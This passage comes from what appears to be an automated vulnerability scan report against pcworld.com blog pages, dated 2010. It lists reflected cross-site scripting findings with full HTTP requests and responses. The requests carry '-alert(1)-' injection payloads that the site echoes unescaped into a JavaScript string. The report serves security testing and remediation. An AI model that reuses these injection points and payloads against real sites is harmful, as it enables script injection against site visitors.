GET /blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a=1bb1da'-alert(1)-'c77cdea635b HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:10:04 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a=1bb1da'-alert(1)-'c77cdea635b';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.19. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f912'-alert(1)-'b3debb63643 was submitted in the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a888f912'-alert(1)-'b3debb63643 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4D19795D48A91C19743A5EE7995F7531; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a888f912'-alert(1)-'b3debb63643';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.20. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae4e'-alert(1)-'9a0126fc56e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/1ae4e'-alert(1)-'9a0126fc56e/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:33 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/1ae4e'-alert(1)-'9a0126fc56e/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp
...[SNIP]...

1.21. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea419'-alert(1)-'b51fcfff3a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.htmlea419'-alert(1)-'b51fcfff3a5/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1AAC872FDF7C9F343B0141870411E085; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.htmlea419'-alert(1)-'b51fcfff3a5/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3
...[SNIP]...

1.22. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb099'-alert(1)-'eb6a63c62cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458ebb099'-alert(1)-'eb6a63c62cf;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E3DF89D1801142FACE5C41B6E3DF863; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:38 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
);
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458ebb099'-alert(1)-'eb6a63c62cf;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eT
...[SNIP]...

1.23. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b08b7'-alert(1)-'01df5185cf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&b08b7'-alert(1)-'01df5185cf0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2A5E1E007DA1F462049228ACF3BA5555; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:18 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
/x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&b08b7'-alert(1)-'01df5185cf0=1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri
...[SNIP]...

1.24. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e

Issue detail

The value of the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 949da'-alert(1)-'4c9710189d5 was submitted in the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday949da'-alert(1)-'4c9710189d5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com
Cookie: JSESSIONID=88994DB01C81D051F0B6D6F44A38E6C2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:15 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday949da'-alert(1)-'4c9710189d5';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.25. http://www.pcworld.com/blogs/id,57/game_on.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,57/game_on.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee968'-alert(1)-'65de885f409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ee968'-alert(1)-'65de885f409/game_on.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:45 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=543B882D6CF32FF06978052092BCB6D6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:44 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/ee968'-alert(1)-'65de885f409/game_on.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.26. http://www.pcworld.com/blogs/id,57/game_on.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,57/game_on.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86f0a'-alert(1)-'a34caebd25c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,57/game_on.html86f0a'-alert(1)-'a34caebd25c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:46 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
on.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,57/game_on.html86f0a'-alert(1)-'a34caebd25c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.27. http://www.pcworld.com/blogs/id,61/bizfeed.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,61/bizfeed.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd1f'-alert(1)-'937bb26ab8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2cd1f'-alert(1)-'937bb26ab8c/bizfeed.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:58:26 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8030AB6C440DDD542DF4DC4B0A9211CD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:25 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/2cd1f'-alert(1)-'937bb26ab8c/bizfeed.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.28. http://www.pcworld.com/blogs/id,61/bizfeed.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,61/bizfeed.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cc54'-alert(1)-'6e34da32754 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,61/bizfeed.html7cc54'-alert(1)-'6e34da32754 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F2DD351341D8E52039B01234FB55A92D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:27 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
on.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,61/bizfeed.html7cc54'-alert(1)-'6e34da32754';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.29. http://www.pcworld.com/blogs/id,62/geek_tech.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,62/geek_tech.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c125'-alert(1)-'39c55748519 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/8c125'-alert(1)-'39c55748519/geek_tech.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:24 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=7968B0FE6A7F566C9D2C640C74AA2358; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:24 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
